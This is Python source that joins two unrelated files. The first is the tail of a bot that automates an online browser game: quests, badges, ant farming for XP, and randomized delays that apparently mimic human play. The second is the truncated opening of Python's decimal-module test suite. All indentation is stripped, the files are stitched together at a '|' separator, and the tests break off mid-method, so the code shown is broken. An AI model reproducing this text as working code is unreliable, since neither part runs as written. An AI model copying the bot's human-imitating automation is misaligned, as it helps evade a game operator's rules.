self.unregister_callback(Event.SHOW_TIMER_BAR, fertilize_cb_timer_bar)
self.unregister_callback(Event.SET_HAND_HELD, fertilize_cb_set_handheld)
del self.__fertilize_expect_event
del self.__fertilizer_count
del self.__fertilizer_target_wob_ids
self.__e_quest_done.wait()
self.log('[Quest] Completed.')
return True
elif quest == 'DAILY_DELIVER_MUSHROOMS':
self.log('[Quest] Collecting 6 mushrooms...')
guis = ['gothics.schwammerl1',
'gothics.schwammerl3',
'gothics.dickesschwammerl1',
'gothics.dickesschwammerl4',
'gothics.schwammerl5',
'gothics.dickesschwammerl3',
'gothics.dickesschwammerl5',
'gothics.schwammerl2']
inv = self.ajax_request_inventory()
queue = self.ajax_request_item_queue()
if self.count_item(inv, self.localeItems.MUSHROOM_BIG_BLUE) > 0 or self.count_item(queue, self.localeItems.MUSHROOM_BIG_BLUE) > 0:
guis.remove('gothics.schwammerl1')
if self.count_item(inv, self.localeItems.MUSHROOM_BIG_RED) > 0 or self.count_item(queue, self.localeItems.MUSHROOM_BIG_RED) > 0:
guis.remove('gothics.schwammerl2')
if self.count_item(inv, self.localeItems.MUSHROOM_BIG_BROWN) > 0 or self.count_item(queue, self.localeItems.MUSHROOM_BIG_BROWN) > 0:
guis.remove('gothics.schwammerl5')
if self.count_item(inv, self.localeItems.MUSHROOM_BIG_GRAY) > 0 or self.count_item(queue, self.localeItems.MUSHROOM_BIG_GRAY) > 0:
guis.remove('gothics.schwammerl3')
if self.count_item(inv, self.localeItems.MUSHROOM_SMALL_BROWN) > 0 or self.count_item(queue, self.localeItems.MUSHROOM_SMALL_BROWN) > 0:
guis.remove('gothics.dickesschwammerl1')
if self.count_item(inv, self.localeItems.MUSHROOM_SMALL_GRAY) > 0 or self.count_item(queue, self.localeItems.MUSHROOM_SMALL_GRAY) > 0:
guis.remove('gothics.dickesschwammerl4')
if self.count_item(inv, self.localeItems.MUSHROOM_SMALL_ORANGE) > 0 or self.count_item(queue, self.localeItems.MUSHROOM_SMALL_ORANGE) > 0:
guis.remove('gothics.dickesschwammerl3')
if self.count_item(inv, self.localeItems.MUSHROOM_SMALL_WHITE) > 0 or self.count_item(queue, self.localeItems.MUSHROOM_SMALL_WHITE) > 0:
guis.remove('gothics.dickesschwammerl5')
if len(guis) > 2:
self.go_to_room('gothics.raum9', False)
self.__e_room_loaded.wait()
self.go_to_room('gothics.friedhof', False)
self.__e_room_loaded.wait()
self.go_to_room('gothics.eule', False)
self.__e_room_loaded.wait()
self.__mushrooms_expect_gui = None
self.__mushrooms_pickup_wob_id = None
self.__mushrooms_pickup_success = False
self.__mushrooms_collected = 0
mushroom_pickup_event = threading.Event()
def mushrooms_cb_create_item(data):
if data['gui'] == self.__mushrooms_expect_gui:
self.__mushrooms_collected += 1
self.__mushrooms_pickup_success = True
def mushrooms_cb_env_remove_item(data):
if self.__mushrooms_pickup_wob_id in data['wobids']:
mushroom_pickup_event.set()
def mushrooms_cb_show_action(data):
if data == self.localeItems.MUSHROOM_ALREADY_IN_INV:
self.__mushrooms_pickup_success = True
mushroom_pickup_event.set()
self.register_callback(Event.NOTIFY_CREATE_ITEM, mushrooms_cb_create_item)
self.register_callback(Event.ENV_REMOVE_ITEMS, mushrooms_cb_env_remove_item)
self.register_callback(Event.SHOW_ACTION_FEEDBACK, mushrooms_cb_show_action)
while self.__mushrooms_collected < 6 and len(guis) > 0:
mushroom = self.closest_iso_item(list(filter(lambda iso_item: iso_item.gui in guis, self.wob_registry.iso_items)))
self.log('[Quest] Picking up mushroom \'{}\'...'.format(mushroom.name))
self.__mushrooms_expect_gui = mushroom.gui
self.__mushrooms_pickup_success = False
self.__mushrooms_pickup_wob_id = mushroom.wob_id
mushroom_pickup_event.clear()
count_before = self.__mushrooms_collected
self.send_item_interaction(mushroom.wob_id, 'USE')
mushroom_pickup_event.wait()
if self.__mushrooms_pickup_success:
guis.remove(mushroom.gui)
if count_before < self.__mushrooms_collected:
self.log('[Quest] Picked up mushroom \'{}\'.'.format(mushroom.name))
self.wait_random_delay(FreggersBot.MIN_SEARCH_DONE_DELAY, FreggersBot.MAX_SEARCH_DONE_DELAY)
self.unregister_callback(Event.NOTIFY_CREATE_ITEM, mushrooms_cb_create_item)
self.unregister_callback(Event.ENV_REMOVE_ITEMS, mushrooms_cb_env_remove_item)
self.unregister_callback(Event.SHOW_ACTION_FEEDBACK, mushrooms_cb_show_action)
del self.__mushrooms_expect_gui
del self.__mushrooms_pickup_wob_id
del self.__mushrooms_pickup_success
del self.__mushrooms_collected
self.go_to_room('western.rail', False)
self.__e_room_loaded.wait()
self.go_to_room('western.indianerdorf', False)
self.__e_room_loaded.wait()
mushrooms_in_inv = len(self.filter_items(self.ajax_request_inventory(), self.localeItems.MUSHROOMS))
if mushrooms_in_inv == 0 and not self.ensure_empty_slots(1):
self.log('[Quest] No inventory space available.')
return False
mushrooms_in_queue = self.filter_items(self.ajax_request_item_queue(), self.localeItems.MUSHROOMS)
mushroom_deliver_event = threading.Event()
def mushrooms_cb_timer_bar(data):
mushroom_deliver_event.set()
self.register_callback(Event.SHOW_TIMER_BAR, mushrooms_cb_timer_bar)
target = self.find_item_by_gui('western.feuerstelle_topf')
len_mushrooms = mushrooms_in_inv + len(mushrooms_in_queue)
for _ in range(len_mushrooms):
if mushrooms_in_inv == 0:
item = mushrooms_in_queue.pop(0)
self.ajax_inbox_action(item['id'], Freggers.INBOX_ACTION_ACCEPT)
else:
mushrooms_in_inv -= 1
mushroom_deliver_event.clear()
self.send_item_interaction(target.wob_id, 'DELIVER_MUSHROOM')
mushroom_deliver_event.wait()
self.log('[Quest] Delivered mushroom.')
self.wait_random_delay(1, 2.5)
self.unregister_callback(Event.SHOW_TIMER_BAR, mushrooms_cb_timer_bar)
self.log('[Quest] Delivered {} mushrooms.'.format(len_mushrooms))
self.__e_quest_done.wait()
self.log('[Quest] Completed.')
return True
elif quest == 'DAILY_DELIVER_ANTS':
self.log('[Quest] Delivering 2 ants...')
ant_count = (len(self.filter_items(self.ajax_request_inventory(), self.localeItems.LAZY_ANTS)) +
len(self.filter_items(self.ajax_request_item_queue(), self.localeItems.LAZY_ANTS)))
remaining = 2 - ant_count
if remaining > 0:
self.collect_ants(max_amount = remaining)
self.deliver_ants(amount = 2)
self.__e_quest_done.wait()
self.log('[Quest] Completed.')
return True
elif quest == 'DAILY_DELIVER_CLOVER':
self.cut_clover(amount = 16)
self.__e_quest_done.wait()
self.log('[Quest] Completed.')
return True
elif quest == 'DAILY_FEED_THE_SHEEP':
            self.log('[Quest] Feeding 6 sheep...')
self.feed_sheeps()
self.__e_quest_done.wait()
self.log('[Quest] Completed.')
return True
elif quest == 'DAILY_REMOVE_PARASITES':
self.log('[Quest] Removing parasites from 9 exotic plants...')
self.go_to_room('tp_botanik.azubi', False)
self.__e_room_loaded.wait()
bugs_event = threading.Event()
def bugs_cb_timer_bar(data):
bugs_event.set()
self.register_callback(Event.SHOW_TIMER_BAR, bugs_cb_timer_bar)
plants = list(filter(lambda iso_item: iso_item.has_interaction('REMOVE_BUGS'), self.wob_registry.iso_items))
for _ in range(len(plants)):
plant = self.sort_iso_items_by_distance(plants)[0]
plants.remove(plant)
bugs_event.clear()
self.send_item_interaction(plant.wob_id, 'REMOVE_BUGS')
bugs_event.wait()
self.wait_random_delay(0.6, 1.8)
self.unregister_callback(Event.SHOW_TIMER_BAR, bugs_cb_timer_bar)
self.__e_quest_done.wait()
self.log('[Quest] Completed.')
return True
else:
print('[Quest] Unknown quest:', quest)
return False
def complete_badges(self):
search = ItemSearch(self, 0)
def search_badge_item(wob_id):
search.wob_id = wob_id
search.search()
self.wait_random_delay(0.5, 3.5)
badge_page = self.get_badge_page()
if not self.get_is_badge_completed(8, badge_page = badge_page):
self.log('[Badge] Completing explorer badge - Wutzlhofen...')
tasks = self.get_badge_tasks(8)
if not tasks[0]:
self.go_to_room('wutzlhofen.flussdampfer', False)
self.wait_room_loaded()
search_badge_item(self.find_item_by_gui('wutzlhofen.flussdampfer_kabeltrommel').wob_id)
if not tasks[1]:
self.go_to_room('wutzlhofen.biergarten', False)
self.wait_room_loaded()
search_badge_item(self.find_item_by_gui('wutzlhofen.biergarten_biergartenschirmstaender').wob_id)
if not tasks[2]:
self.go_to_room('wutzlhofen.bistro', False)
self.wait_room_loaded()
search_badge_item(next(filter(lambda x: x.has_interaction('SEARCH'), self.find_items_by_gui('wutzlhofen.bistro_sofadreisitzer'))).wob_id)
if not self.get_is_badge_completed(9):
self.log('[Badge] Completing explorer badge - Hood...')
tasks = self.get_badge_tasks(9)
if not tasks[0]:
self.go_to_room('hood.outskirts', False)
self.wait_room_loaded()
search_badge_item(next(filter(lambda x: x.has_interaction('SEARCH'), self.find_items_by_gui('hood.outskirts_muellhaufen'))).wob_id)
if not tasks[1]:
self.go_to_room('hood.strasse', False)
self.wait_room_loaded()
search_badge_item(self.find_item_by_gui('hood.strasse_muelltonneliegend').wob_id)
if not tasks[2]:
self.go_to_room('hood.waschsalon', False)
self.wait_room_loaded()
search_badge_item(next(filter(lambda x: x.has_interaction('SEARCH'), self.find_items_by_gui('hood.waschsalon_waschmaschine'))).wob_id)
if not self.get_is_badge_completed(10):
self.log('[Badge] Completing explorer badge - Tumbleweed Valley')
tasks = self.get_badge_tasks(10)
if not tasks[0]:
self.go_to_room('western.fort', False)
self.wait_room_loaded()
search_badge_item(next(filter(lambda x: x.iso_obj.get_uvz().x == 239, self.find_items_by_gui('western.kanonenkugeln'))).wob_id)
if not tasks[1]:
self.go_to_room('western.saloonzimmer1', False)
self.wait_room_loaded()
search_badge_item(self.find_item_by_gui('western.badezuber').wob_id)
if not tasks[2]:
self.go_to_room('western.backlands', False)
self.wait_room_loaded()
search_badge_item(self.find_item_by_gui('western.backlands_sitzstein1').wob_id)
if not self.get_is_badge_completed(20):
self.log('[Badge] Completing explorer badge - Schattenland')
tasks = self.get_badge_tasks(20)
if not tasks[0]:
self.go_to_room('gothics.friedhof', False)
self.wait_room_loaded()
time.sleep(1.5)
search_badge_item(next(filter(lambda x: x.has_interaction('SEARCH'), self.find_items_by_gui('gothics.friedhof_uferbank'))).wob_id)
if not tasks[1]:
self.go_to_room('gothics.gruft', False)
self.wait_room_loaded()
search_badge_item(next(filter(lambda x: x.has_interaction('SEARCH'), self.find_items_by_gui('hood.getraenkedoserot'))).wob_id)
if not tasks[2]:
self.go_to_room('gothics.kirche', False)
self.wait_room_loaded()
search_badge_item(self.find_item_by_gui('gothics.kirche_reliquienschrein').wob_id)
search.cleanup()
if not self.get_is_badge_completed(21):
self.log('[Badge] Completing games badge')
tasks = self.get_badge_tasks(21)
if not tasks[0]:
self.send_set_status(Status.PLAYING, 'astrovoids')
self.send_delete_status(Status.PLAYING)
if not tasks[1]:
self.send_set_status(Status.PLAYING, 'jewels')
self.send_delete_status(Status.PLAYING)
if not tasks[2]:
self.send_set_status(Status.PLAYING, 'puzzle')
self.send_delete_status(Status.PLAYING)
if not tasks[3]:
self.send_set_status(Status.PLAYING, 'deserthunter')
self.send_delete_status(Status.PLAYING)
if not tasks[4]:
self.send_set_status(Status.PLAYING, 'whackthehampster')
self.send_delete_status(Status.PLAYING)
if not self.get_is_badge_completed(31):
self.log('[Badge] Completing sounds badge')
tasks = self.get_badge_tasks(31)
if not tasks[0]:
self.go_to_room('hood.backalley', False)
self.wait_room_loaded()
self.send_user_command('miau')
if not tasks[1]:
self.go_to_room('western.saloon', False)
self.wait_room_loaded()
self.send_user_command('ruelps')
if not tasks[2]:
self.go_to_room('wutzlhofen.museum', False)
self.wait_room_loaded()
self.send_user_command('nies')
if not tasks[3]:
self.go_to_room('gothics.kirche', False)
self.wait_room_loaded()
self.send_user_command('gaehn')
if not tasks[4]:
self.go_to_home('plattenbau.eigenheim', False)
self.wait_room_loaded()
self.send_user_command('furz')
if not self.__church_visited_today and not self.get_is_badge_completed(41) and get_local_datetime().weekday() == 6:
self.log('[Badge] Completing church visitor badge')
self.go_to_room('gothics.kirche', False)
self.__church_visited_today = True
self.wait_room_loaded()
self.wait_random_delay(0.5, 3)
def daily_routine(self, skip_first_cycle = False, idle_room = 'plattenbau%2.eigenheim', idle_room_alt = 'plattenbau.plattenbau',
care_pets = False, care_pompom = False, complete_quests = False, complete_badges = False, maintain_amount = 25, overload_amount = 100, min_deliver_amount = 3,
loop_min_idle_sec = 60 * 60, loop_max_idle_sec = 2 * 60 * 60):
self.log('Beginning daily routine...')
if skip_first_cycle:
self.__church_visited_today = True
self.send_delete_status(Status.PRANKED)
self.send_delete_status(Status.PLAYING)
self.send_delete_status(Status.GHOST)
self.send_delete_status(Status.SPOOK)
self.send_delete_status(Status.WITCHBROOM)
self.send_delete_status(Status.CLOAK)
self.send_set_status(Status.NOSOUND)
next_quick_strong = 0
loop_min_idle_sec *= 1000
loop_max_idle_sec *= 1000
last_day = -1
ant_amount = self.get_items_count(self.localeItems.LAZY_ANTS)
total_ants_delivered = 0
total_ants_collected = 0
total_covered_wagon = 0
total_construction_site = 0
total_time_idle = 0
start_time = time.time()
last_delivery = -1
self.__e_level_data.wait()
start_level = self.level_data['level']
while True:
if next_quick_strong <= time.time():
self.send_set_status(Status.QUICK_STRONG)
next_quick_strong = time.time() + 604800
self.log('Added strong speed effect.')
if complete_quests:
self.complete_quest()
now_day = get_local_datetime().day
day_change = now_day != last_day and (last_day != -1 or not skip_first_cycle)
empty_slots = FreggersBot.count_empty_slots(self.ajax_request_inventory())
while empty_slots > 0:
self.log('Filling {} empty slots with ants...'.format(empty_slots))
ants_in_queue = self.filter_items(self.ajax_request_item_queue(), self.localeItems.LAZY_ANTS)
missing_ants = empty_slots - len(ants_in_queue)
for _ in range(min(empty_slots, len(ants_in_queue))):
ant_in_queue = ants_in_queue.pop(0)
self.ajax_inbox_action(ant_in_queue['id'], Freggers.INBOX_ACTION_ACCEPT)
self.log('Filled empty slot with ant.')
if missing_ants > 0:
self.log('Not enough ants available to fill all empty slots. Collecting {} ants...'.format(missing_ants))
self.collect_ants(max_amount = missing_ants)
empty_slots = FreggersBot.count_empty_slots(self.ajax_request_inventory())
if day_change:
self.__church_visited_today = False
if self.search_covered_wagon():
total_covered_wagon += 1
if self.search_noisy_construction_site():
total_construction_site += 1
self.__e_level_data.wait()
level_up_expected = self.level_data['xp_total'] == self.level_data['xp_cap']
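            # 559 appears to be the XP gained per delivered ant; deliver just enough
            # ants to reach the XP cap (or a flat 20 on a day change).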
ants_to_deliver = 20 if day_change else math.ceil((self.level_data['xp_cap'] - self.level_data['xp_current']) / 559)
if not level_up_expected and ants_to_deliver < min_deliver_amount:
self.log('Not enough ants to deliver ({} / {}). Waiting for a higher xp cap.'.format(ants_to_deliver, min_deliver_amount))
ants_to_deliver = 0
if ant_amount < ants_to_deliver:
self.log('Collecting {} ants to deliver...'.format(ants_to_deliver - ant_amount))
collected_ants = self.collect_ants(max_amount = ants_to_deliver - ant_amount)
ant_amount += collected_ants
total_ants_collected += collected_ants
self.log('Collected {} ants.'.format(collected_ants))
if ants_to_deliver > 0:
if last_delivery != -1:
self.log('Last delivery is {} ago.'.format(format_time(time.time() - last_delivery)))
self.log('Delivering {} ants...'.format(ants_to_deliver))
delivered_ants = self.deliver_ants(amount = ants_to_deliver)
if delivered_ants == 0:
level_up_expected = False
ant_amount -= delivered_ants
total_ants_delivered += delivered_ants
last_delivery = time.time()
self.log('Delivered {} ants.'.format(delivered_ants))
if not level_up_expected:
if ant_amount < maintain_amount:
collect_amount = maintain_amount - ant_amount + overload_amount
self.log('Collecting {} ants to maintain the minimum amount of ants...'.format(collect_amount))
collected_ants = self.collect_ants(max_amount = collect_amount)
ant_amount += collected_ants
total_ants_collected += collected_ants
self.log('Collected {} ants.'.format(collected_ants))
self.log('[Stats] Ants: current = {} | collected = {} | delivered = {}'.format(ant_amount, total_ants_collected, total_ants_delivered))
            self.log('[Stats] Construction site searches: {}'.format(total_construction_site))
            self.log('[Stats] Covered wagon searches: {}'.format(total_covered_wagon))
            self.log('[Stats] Level-ups: {}'.format(self.level_data['level'] - start_level))
            self.log('[Stats] Total time idling: {}'.format(format_time(total_time_idle)))
            self.log('[Stats] Total time running: {}'.format(format_time(time.time() - start_time)))
if complete_badges:
self.complete_badges()
self.delete_trash_items()
self.go_to_home(idle_room, True)
if care_pets:
self.care_pets(idle_room, True)
if care_pompom:
self.care_pompom(idle_room, True)
self.daily_routine_on_idle()
idle_time = random.randint(loop_min_idle_sec, loop_max_idle_sec) / 1000
self.log('Idling for {}...'.format(format_time(idle_time)))
time.sleep(idle_time)
total_time_idle += idle_time
self.go_to_room(idle_room_alt, False)
last_day = now_day
def daily_routine_on_idle(self):
seats = list(filter(lambda item: item.get_primary_interaction() != None and item.get_primary_interaction().label == 'SIT_DOWN', self.wob_registry.iso_items))
if len(seats) > 0:
self.send_item_interaction(random.choice(seats).wob_id, 'SIT_DOWN')
def print_items(self):
for wob in self.wob_registry.iso_items:
print(wob.wob_id, wob.gui, wob.name, wob.interactions, wob.get_properties())
def wait_room_loaded(self):
self.__e_room_loaded.wait() |
test_decimal.py | # Copyright (c) 2004 Python Software Foundation.
# All rights reserved.
# Written by Eric Price <eprice at tjhsst.edu>
# and Facundo Batista <facundo at taniquetil.com.ar>
# and Raymond Hettinger <python at rcn.com>
# and Aahz (aahz at pobox.com)
# and Tim Peters
"""
These are the test cases for the Decimal module.
There are two groups of tests: Arithmetic and Behaviour. The former tests
the Decimal arithmetic using the tests provided by Mike Cowlishaw. The latter
tests the pythonic behaviour according to PEP 327.
Cowlishaw's tests can be downloaded from:
www2.hursley.ibm.com/decimal/dectest.zip
This test module can be called from command line with one parameter (Arithmetic
or Behaviour) to test each part, or without parameter to test both parts. If
you're working through IDLE, you can import this test module and call test_main()
with the corresponding argument.
"""
from __future__ import with_statement
import unittest
import glob
import os, sys
import pickle, copy
from decimal import *
from test.test_support import (TestSkipped, run_unittest, run_doctest,
is_resource_enabled)
import random
try:
import threading
except ImportError:
threading = None
# Useful Test Constant
Signals = getcontext().flags.keys()
# Tests are built around these assumed context defaults.
# test_main() restores the original context.
def init():
global ORIGINAL_CONTEXT
ORIGINAL_CONTEXT = getcontext().copy()
DefaultContext.prec = 9
DefaultContext.rounding = ROUND_HALF_EVEN
DefaultContext.traps = dict.fromkeys(Signals, 0)
setcontext(DefaultContext)
TESTDATADIR = 'decimaltestdata'
if __name__ == '__main__':
file = sys.argv[0]
else:
file = __file__
testdir = os.path.dirname(file) or os.curdir
directory = testdir + os.sep + TESTDATADIR + os.sep
skip_expected = not os.path.isdir(directory)
# Make sure it actually raises errors when not expected and caught in flags
# Slower, since it runs some things several times.
EXTENDEDERRORTEST = False
#Map the test cases' error names to the actual errors
ErrorNames = {'clamped' : Clamped,
'conversion_syntax' : InvalidOperation,
'division_by_zero' : DivisionByZero,
'division_impossible' : InvalidOperation,
'division_undefined' : InvalidOperation,
'inexact' : Inexact,
'invalid_context' : InvalidOperation,
'invalid_operation' : InvalidOperation,
'overflow' : Overflow,
'rounded' : Rounded,
'subnormal' : Subnormal,
'underflow' : Underflow}
def Nonfunction(*args):
"""Doesn't do anything."""
return None
RoundingDict = {'ceiling' : ROUND_CEILING, #Maps test-case names to roundings.
'down' : ROUND_DOWN,
'floor' : ROUND_FLOOR,
'half_down' : ROUND_HALF_DOWN,
'half_even' : ROUND_HALF_EVEN,
'half_up' : ROUND_HALF_UP,
'up' : ROUND_UP}
# Name adapter to be able to change the Decimal and Context
# interface without changing the test files from Cowlishaw
nameAdapter = {'toeng':'to_eng_string',
'tosci':'to_sci_string',
'samequantum':'same_quantum',
'tointegral':'to_integral',
'remaindernear':'remainder_near',
'divideint':'divide_int',
'squareroot':'sqrt',
'apply':'_apply',
}
class DecimalTest(unittest.TestCase):
"""Class which tests the Decimal class against the test cases.
Changed for unittest.
"""
def setUp(self):
self.context = Context()
for key in DefaultContext.traps.keys():
DefaultContext.traps[key] = 1
self.ignore_list = ['#']
# Basically, a # means return NaN InvalidOperation.
# Different from a sNaN in trim
self.ChangeDict = {'precision' : self.change_precision,
'rounding' : self.change_rounding_method,
'maxexponent' : self.change_max_exponent,
'minexponent' : self.change_min_exponent,
'clamp' : self.change_clamp}
def tearDown(self):
"""Cleaning up enviroment."""
# leaving context in original state
for key in DefaultContext.traps.keys():
DefaultContext.traps[key] = 0
return
def eval_file(self, file):
global skip_expected
if skip_expected:
raise TestSkipped
return
for line in open(file).xreadlines():
line = line.replace('\r\n', '').replace('\n', '')
#print line
try:
t = self.eval_line(line)
except InvalidOperation:
print 'Error in test cases:'
print line
continue
except DecimalException, exception:
                #Exception raised where there shouldn't have been one.
self.fail('Exception "'+exception.__class__.__name__ + '" raised on line '+line)
return
def eval_line(self, s):
if s.find(' -> ') >= 0 and s[:2] != '--' and not s.startswith(' --'):
s = (s.split('->')[0] + '->' +
s.split('->')[1].split('--')[0]).strip()
else:
s = s.split('--')[0].strip()
for ignore in self.ignore_list:
if s.find(ignore) >= 0:
#print s.split()[0], 'NotImplemented--', ignore
return
if not s:
return
elif ':' in s:
return self.eval_directive(s)
else:
return self.eval_equation(s)
def eval_directive(self, s):
funct, value = map(lambda x: x.strip().lower(), s.split(':'))
if funct == 'rounding':
value = RoundingDict[value]
else:
try:
value = int(value)
except ValueError:
pass
funct = self.ChangeDict.get(funct, Nonfunction)
funct(value)
def eval_equation(self, s):
#global DEFAULT_PRECISION
#print DEFAULT_PRECISION
if not TEST_ALL and random.random() < 0.90:
return
try:
Sides = s.split('->')
L = Sides[0].strip().split()
id = L[0]
# print id,
funct = L[1].lower()
valstemp = L[2:]
L = Sides[1].strip().split()
ans = L[0]
exceptions = L[1:]
except (TypeError, AttributeError, IndexError):
raise InvalidOperation
def FixQuotes(val):
val = val.replace("''", 'SingleQuote').replace('""', 'DoubleQuote')
val = val.replace("'", '').replace('"', '')
val = val.replace('SingleQuote', "'").replace('DoubleQuote', '"')
return val
fname = nameAdapter.get(funct, funct)
if fname == 'rescale':
return
funct = getattr(self.context, fname)
vals = []
conglomerate = ''
quote = 0
theirexceptions = [ErrorNames[x.lower()] for x in exceptions]
for exception in Signals:
self.context.traps[exception] = 1 #Catch these bugs...
for exception in theirexceptions:
self.context.traps[exception] = 0
for i, val in enumerate(valstemp):
if val.count("'") % 2 == 1:
quote = 1 - quote
if quote:
conglomerate = conglomerate + ' ' + val
continue
else:
val = conglomerate + val
conglomerate = ''
v = FixQuotes(val)
if fname in ('to_sci_string', 'to_eng_string'):
if EXTENDEDERRORTEST:
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(self.context.create_decimal(v))
except error:
pass
except Signals, e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
v = self.context.create_decimal(v)
else:
v = Decimal(v)
vals.append(v)
ans = FixQuotes(ans)
if EXTENDEDERRORTEST and fname not in ('to_sci_string', 'to_eng_string'):
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals, e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
try:
result = str(funct(*vals))
if fname == 'same_quantum':
result = str(int(eval(result))) # 'True', 'False' -> '1', '0'
except Signals, error:
self.fail("Raised %s in %s" % (error, s))
except: #Catch any error long enough to state the test case.
print "ERROR:", s
raise
myexceptions = self.getexceptions()
self.context.clear_flags()
myexceptions.sort()
theirexceptions.sort()
self.assertEqual(result, ans,
'Incorrect answer for ' + s + ' -- got ' + result)
self.assertEqual(myexceptions, theirexceptions,
'Incorrect flags set in ' + s + ' -- got ' \
+ str(myexceptions))
return
def getexceptions(self):
return [e for e in Signals if self.context.flags[e]]
def change_precision(self, prec):
self.context.prec = prec
def change_rounding_method(self, rounding):
self.context.rounding = rounding
def change_min_exponent(self, exp):
self.context.Emin = exp
def change_max_exponent(self, exp):
self.context.Emax = exp
def change_clamp(self, clamp):
self.context._clamp = clamp
# Dynamically build custom test definition for each file in the test
# directory and add the definitions to the DecimalTest class. This
# procedure ensures that new files do not get skipped.
for filename in os.listdir(directory):
if '.decTest' not in filename:
continue
head, tail = filename.split('.')
tester = lambda self, f=filename: self.eval_file(directory + f)
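    # (f=filename binds the current filename at definition time; a plain closure
    # would late-bind and every generated test would evaluate only the last file.)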
setattr(DecimalTest, 'test_' + head, tester)
del filename, head, tail, tester
# The following classes test the behaviour of Decimal according to PEP 327
class DecimalExplicitConstructionTest(unittest.TestCase):
'''Unit tests for Explicit Construction cases of Decimal.'''
def test_explicit_empty(self):
self.assertEqual(Decimal(), Decimal("0"))
def test_explicit_from_None(self):
self.assertRaises(TypeError, Decimal, None)
def test_explicit_from_int(self):
#positive
d = Decimal(45)
self.assertEqual(str(d), '45')
#very large positive
d = Decimal(500000123)
self.assertEqual(str(d), '500000123')
#negative
d = Decimal(-45)
self.assertEqual(str(d), '-45')
#zero
d = Decimal(0)
self.assertEqual(str(d), '0')
def test_explicit_from_string(self):
#empty
self.assertEqual(str(Decimal('')), 'NaN')
#int
self.assertEqual(str(Decimal('45')), '45')
#float
self.assertEqual(str(Decimal('45.34')), '45.34')
        #engineering notation
self.assertEqual(str(Decimal('45e2')), '4.5E+3')
#just not a number
self.assertEqual(str(Decimal('ugly')), 'NaN')
def test_explicit_from_tuples(self):
#zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(str(d), '0')
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(str(d), '-45')
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(str(d), '45.34')
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
#wrong number of items
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1)) )
#bad sign
self.assertRaises(ValueError, Decimal, (8, (4, 3, 4, 9, 1), 2) )
#bad exp
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 'wrong!') )
#bad coefficients
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, None, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, -3, 4, 9, 1), 2) )
def test_explicit_from_Decimal(self):
#positive
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
self.assertNotEqual(id(d), id(e))
#very large positive
d = Decimal(500000123)
e = Decimal(d)
self.assertEqual(str(e), '500000123')
self.assertNotEqual(id(d), id(e))
#negative
d = Decimal(-45)
e = Decimal(d)
self.assertEqual(str(e), '-45')
self.assertNotEqual(id(d), id(e))
#zero
d = Decimal(0)
e = Decimal(d)
self.assertEqual(str(e), '0')
self.assertNotEqual(id(d), id(e))
def test_explicit_context_create_decimal(self):
nc = copy.copy(getcontext())
nc.prec = 3
# empty
d = Decimal()
self.assertEqual(str(d), '0')
d = nc.create_decimal()
self.assertEqual(str(d), '0')
# from None
self.assertRaises(TypeError, nc.create_decimal, None)
# from int
d = nc.create_decimal(456)
self.failUnless(isinstance(d, Decimal))
self.assertEqual(nc.create_decimal(45678),
nc.create_decimal('457E+2'))
# from string
d = Decimal('456789')
self.assertEqual(str(d), '456789')
d = nc.create_decimal('456789')
self.assertEqual(str(d), '4.57E+5')
# from tuples
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
d = nc.create_decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.35E-17')
# from Decimal
prevdec = Decimal(500000123)
d = Decimal(prevdec)
self.assertEqual(str(d), '500000123')
d = nc.create_decimal(prevdec)
self.assertEqual(str(d), '5.00E+8')
class DecimalImplicitConstructionTest(unittest.TestCase):
'''Unit tests for Implicit Construction cases of Decimal.'''
def test_implicit_from_None(self):
self.assertRaises(TypeError, eval, 'Decimal(5) + None', globals())
def test_implicit_from_int(self):
#normal
self.assertEqual(str(Decimal(5) + 45), '50')
#exceeding precision
self.assertEqual(Decimal(5) + 123456789000, Decimal(123456789000))
def test_implicit_from_string(self):
self.assertRaises(TypeError, eval, 'Decimal(5) + "3"', globals())
def test_implicit_from_float(self):
self.assertRaises(TypeError, eval, 'Decimal(5) + 2.2', globals())
def test_implicit_from_Decimal(self):
self.assertEqual(Decimal(5) + Decimal(45), Decimal(50))
def test_rop(self):
# Allow other classes to be trained to interact with Decimals
class E:
def __divmod__(self, other):
return 'divmod ' + str(other)
def __rdivmod__(self, other):
return str(other) + ' rdivmod'
def __lt__(self, other):
return 'lt ' + str(other)
def __gt__(self, other):
return 'gt ' + str(other)
def __le__(self, other):
return 'le ' + str(other)
def __ge__(self, other):
return 'ge ' + str(other)
def __eq__(self, other):
return 'eq ' + str(other)
def __ne__(self, other):
return 'ne ' + str(other)
self.assertEqual(divmod(E(), Decimal(10)), 'divmod 10')
self.assertEqual(divmod(Decimal(10), E()), '10 rdivmod')
self.assertEqual(eval('Decimal(10) < E()'), 'gt 10')
self.assertEqual(eval('Decimal(10) > E()'), 'lt 10')
self.assertEqual(eval('Decimal(10) <= E()'), 'ge 10')
self.assertEqual(eval('Decimal(10) >= E()'), 'le 10')
self.assertEqual(eval('Decimal(10) == E()'), 'eq 10')
self.assertEqual(eval('Decimal(10) != E()'), 'ne 10')
# insert operator methods and then exercise them
oplist = [
('+', '__add__', '__radd__'),
('-', '__sub__', '__rsub__'),
('*', '__mul__', '__rmul__'),
('%', '__mod__', '__rmod__'),
('//', '__floordiv__', '__rfloordiv__'),
('**', '__pow__', '__rpow__')
]
if 1/2 == 0:
# testing with classic division, so add __div__
oplist.append(('/', '__div__', '__rdiv__'))
else:
# testing with -Qnew, so add __truediv__
